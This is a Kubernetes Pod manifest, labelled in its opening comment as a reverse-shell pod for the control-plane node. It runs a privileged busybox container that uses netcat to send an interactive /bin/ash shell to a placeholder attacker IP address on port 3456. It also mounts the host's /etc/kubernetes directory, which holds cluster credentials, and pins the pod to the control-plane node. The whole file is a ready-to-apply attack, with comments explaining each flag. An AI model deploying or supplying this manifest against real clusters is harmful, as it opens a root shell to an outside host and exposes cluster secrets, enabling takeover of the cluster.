# pod with reverse shell - control-plane node
apiVersion: v1
kind: Pod
metadata:
  name: busybox
spec:
  containers:
    - name: busybox
      image: busybox
      stdin: true
      tty: true
      command:
        # netcat
        - /bin/nc
        - "ATTACKER_DEVICE_IP_ADDRESS"
        # port
        - "3456"
        # allows executing program and forwards its stdin/out through network connection
        - "-e"
        # shell
        - /bin/ash
        # adds interactivity
        - "-i"
      securityContext:
        privileged: true
      volumeMounts:
        - mountPath: /host
          name: hostfs
  volumes:
    - name: hostfs
      hostPath:
        path: /etc/kubernetes
        type: "Directory"
  nodeSelector:
    kubernetes.io/hostname: "cluster-control-plane"
